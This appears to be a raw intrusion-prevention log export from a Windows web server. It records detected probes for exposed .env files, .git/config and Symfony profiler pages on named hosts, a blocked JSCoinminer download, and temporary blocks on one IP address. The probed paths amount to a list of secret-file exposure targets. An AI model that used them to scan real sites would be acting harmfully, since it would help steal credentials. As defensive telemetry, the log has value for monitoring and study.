000003b9	01dc94503b7e6573	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc945016dd1b05	01dc945016dd1b05	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE2RDlEQ0MyLTk0NTAtMTFGMS05NzJCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000019e8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b6	01dc94503ed19114	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc945018db3d34	01dc945018db3d34	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE4REIxOTZFLTk0NTAtMTFGMS05NjAyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000019ec	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/main/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc94503ed19114	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94501aa76634	01dc94501aa76634	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjFBQTQzMDQ2LTk0NTAtMTFGMS05NkMyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00003e06	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc945048d0747b	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc9450233ea8e5	01dc9450233ea8e5	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjIzM0I3MkQ5LTk0NTAtMTFGMS04QTVDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000027b0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc945052c41f62	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94502d7637cd	01dc94502d7637cd	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJENzYxNDA0LTk0NTAtMTFGMS04RUE2LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00007c0a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.env.old			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b6	01dc94505617492c	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94502f3a403c	01dc94502f3a403c	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjJGMzdCQTNELTk0NTAtMTFGMS04MTYzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00007c0a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.env.prod			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9450b691c6e6	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc945090628c47	01dc945090628c47	00000001	00000000	Active Response that started at 2/2/2026 9:21:04 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b1	01dc9450ef0d50f8	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9450cb1a33cf	01dc9450cb1a33cf	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNCMTcxMDExLTk0NTAtMTFGMS04MEMzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008f7a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://en.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b1	01dc9451600a0fb6	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94513a398d7f	01dc94513a398d7f	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjNBMzgxMTc1LTk0NTEtMTFGMS05MTVGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d986	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://es.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc945187e9a298	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc945186f6720f	01dc9452ec972e0f	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 9:37:59 PM to 2/2/2026 9:47:59 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc9451ac7bc90d	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9451867a769b	01dc9451867a769b	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjMwODgwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQzMDE0MDQ5LCJ1aWQiOiIwNDY4MjlDMi0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI4Njc3QjQ2OS05NDUxLTExRjEtQjE1QS04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG03ZDZiZDg0NS03MjI3LTQwODMtOWNhNC05NzhiNWRhYjcxNDIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyMTI2OCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAzNTMzOTQwNCwidWlkIjoiMDQ2ODE3NTctMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000ceeb	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770043017.8503720760345458984375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000db9	01dc9452847dea59	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94525d7a43b8	01dc94525d7a43b8	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQxMTA0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQzNDMyMjQ3LCJ1aWQiOiIwNDY4MkFCOC0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI1RDc3NzEzRi05NDUyLTExRjEtOUI4Ny04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d796	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770043435.6462860107421875000000			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003ac	01dc9452c39c98dd	000000ce	0000000f	164a8367	c76eb2c3	00000002	00000002	00000001	01dc94529ec6f138	01dc94529ec6f138	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlFQzYyRDY1LTk0NTItMTFGMS04NEVDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a4ea	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://mayphatdienonlinehathanh.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9453136495b7	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9452ec997c32	01dc9452ec997c32	00000001	00000000	Active Response that started at 2/2/2026 9:37:59 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003cd	01dc9457f540dace	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d12f19c1	01dc9457d12f19c1	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxMkJFMzYwLTk0NTctMTFGMS05MkVCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000cc6c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://hostmaster.pct.com.vn/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c8	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d1c7b0cf	01dc9457d1c7b0cf	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxNEFFMjEwLTk0NTctMTFGMS05MkY4LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000cc72	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://mail1.pct.com.vn/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d237c055	01dc9457d237c055	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyMzQ4OUI0LTk0NTctMTFGMS05NTVBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cc6c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://hostmaster.pct.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d25de629	01dc9457d25de629	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyNUFBRkYyLTk0NTctMTFGMS05NTZBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cc72	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://mail1.pct.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bf	01dc9457f8940b89	000000ce	0000000f	164a8367	6129f9ad	00000002	00000002	00000001	01dc9457d281a9af	01dc9457d281a9af	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQyN0U3MkYxLTk0NTctMTFGMS05NTc5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000cc72	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://mail1.pct.com.vn/.env.example			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
